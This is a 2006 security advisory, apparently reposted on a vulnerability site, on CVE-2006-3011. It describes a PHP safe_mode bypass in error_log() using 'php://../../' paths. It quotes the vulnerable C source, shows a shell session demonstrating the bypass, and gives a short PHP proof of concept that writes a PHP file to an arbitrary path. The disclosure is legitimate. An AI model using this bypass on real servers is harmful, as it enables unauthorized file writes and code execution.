PHP 5.1.4 and 4.4.2 error_log() Safe Mode Bypass

2006-06-25 / 2006-06-26
Credit: Maksymilian Arciemowicz
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2006-3011
CWE: CWE-264


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 10.6.2006 - -Public: 26.06.2006 CVE-2006-3011 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig S&#230;ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. error_log -- Send an error message somewhere. - --- 1. error_log() Safe Mode Bypass --- error_log() function send to email, file or display your error message. You can send error messages per mail or write into files. Issue is very simple. error_log() check safe_mode and open_basedir in stream function. But isn't allowed use URL. And problem exists in incorrect filename. PHP5: - -2013-2050--- PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC) { php_stream *stream = NULL; switch (opt_err) { case 1: /*send an email */ { #if HAVE_SENDMAIL if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) { return FAILURE; } #else php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!"); return FAILURE; #endif } break; case 2: /*send to an address */ php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!"); return FAILURE; break; case 3: /*save to a file */ stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL); if (!stream) return FAILURE; php_stream_write(stream, message, strlen(message)); php_stream_close(stream); break; default: php_log_err(message TSRMLS_CC); break; } return SUCCESS; } - -2013-2050--- Let's see to option 3. - -2038 line--- stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL); - -2038 line--- Option "a", writte to file error or if file dosen't exists, create new file. Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL". IGNORE_URL turn off safe_mode if you use "prefix://../../". - -Example--- cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");' Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1 Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1 cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");' cxib# ls -la /www/temp/sr.php - -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php cxib# - -Example--- - --- 2. Exploit --- <?php $file=""; # FILENAME error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file); ?> - --- 3. How to fix --- No response from PHP Team. We have reported this bug in 11.06.2006 - --- 4. Contact --- Author: Maksymilian Arciemowicz


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top